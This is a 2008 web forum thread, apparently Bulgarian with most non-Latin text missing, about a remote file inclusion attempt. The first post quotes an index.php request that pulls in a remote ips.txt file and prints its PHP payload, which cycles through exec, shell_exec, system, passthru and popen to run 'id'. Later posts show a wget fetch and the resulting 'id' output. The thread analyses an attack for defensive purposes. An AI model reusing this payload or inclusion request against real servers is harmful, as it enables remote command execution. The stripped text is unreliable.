Results 1 to 12 of 12
Thread: PHP .
Hybrid View
-
14th July 2008 22:45 #1
PHP .
- ( ) , . :
: /index.php?hhTest=http://www.hotelberberys.pl/includes/domit/ips.txt?
: ?Code:<?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit;
-
14th July 2008 23:46 #2Registered User
Join Date: Aug:2006
Location: Sofia
Posts: 37
shell id ( ). id.
-
15th July 2008 10:57 #3
-
15th July 2008 00:20 #4
-
15th July 2008 01:04 #5Registered User
Join Date: Jul:2008
Location:
Posts: 1
$ wget "http://www.hotelberberys.pl/includes/domit/ips.txt"
?
-
15th July 2008 01:11 #6
-
15th July 2008 02:00 #7
, , URL- .
GET .
.

.
index.php (.. , ) , , eval() include().
-
15th July 2008 02:45 #8
id
:Code:$ id uid=501(mitkok) gid=20(staff) groups=20(staff),101(com.apple.sharepoint.group.1),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
Code:Mic22uid=70(_www) gid=70(_www) groups=70(_www)
Last edited by fly; 15th July 2008 at 02:52.
-
15th July 2008 03:46 #9.
Originally Posted by Avast
Avast! .
-
15th July 2008 10:45 #10
-
15th July 2008 09:32 #11
-
15th July 2008 11:04 #12




Reply With Quote

Lenovo ThinkPad 15 IdeaPad 15
5th May 2023, 22:16 in